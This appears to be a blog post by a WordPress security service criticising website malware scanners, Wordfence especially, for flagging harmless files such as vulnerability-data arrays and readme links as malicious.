One of the major problems with anti-virus software for computers is that the signatures they use to detect malicious code can falsely detect non-malicious code as being the malicious code they are supposed to be identifying. In more serious cases that can cause critical operating system files to be removed and the computer to no longer be functional.
Security products for websites, instead of learning from the mistakes of the computer based counterparts, have carried on this tradition, causing problems for developers of WordPress plugins. We have personal experience with that through our plugin connected with this service. On several instances we had people reporting that our plugin contained malicious files, one example is in a review of the plugin. The only in thing in the supposedly malicious files was the data on vulnerabilities like this:
$plugin_vulnerabilities["enable-google-analytics"] = array( "1" => array( "FirstVersion" => "", "LastVersion" => "", "TypeOfVulnerability" => "remote code execution (RCE)", "URL" => "https://wordpress.org/support/topic/how-to-report-malware-in-plugins" ), );
As best we can tell what was causing the detection was the URLs for the various vulnerabilities, in that review one of the detections is listed at “# Regular expression match = [1337day\.com]”. There isn’t a good reason for listing a file as being malicious simply including the domain name of a website listing vulnerabilities, but that is the quality level of this type of product. Unfortunately the downside of poor quality of this type of product doesn’t fall on the people who are responsible for it, instead on innocent developers.
Wordfence’s Bad False Positives
One such producer of just this type of poor false positive is Wordfence, the WordPress security plugin/security service. In one instance in 2014 someone we had done a hack cleanup for several months before contacted us concerned that they had been hacked again after receiving an email warning from Wordfence of a “critical problem” on the website:
Wordfence found the following new issues on “[redacted]”.
Alert generated at Sunday 19th of October 2014 at 11:56:40 PM
* File contains suspected malware URL: [redacted]/public_html/wp-content/plugins/wp-super-cache/readme.txt
So what was the cause of this “critical problem”, it was link in a readme.txt file, which was completely harmless.
Right after that information in that email, was ad for their paid service, so it might be reasonable to ask if their unnecessary scaring people benefits them financially:
NOTE: You are using the free version of Wordfence. Upgrading to the paid version of Wordfence gives you
two factor authentication (sign-in via cellphone) and country blocking which are both effective methods to block attacks.
A Premium Wordfence license also includes remote scanning with each scan of your site which can detect
several additional website infections. Premium members can also schedule when website scans occur and
can scan more than once per day.
As a Premium member you also get access to our priority support system located at http://support.wordfence.com/ and can file
priority support tickets using our ticketing system.
Click here to sign-up for the Premium version of Wordfence now.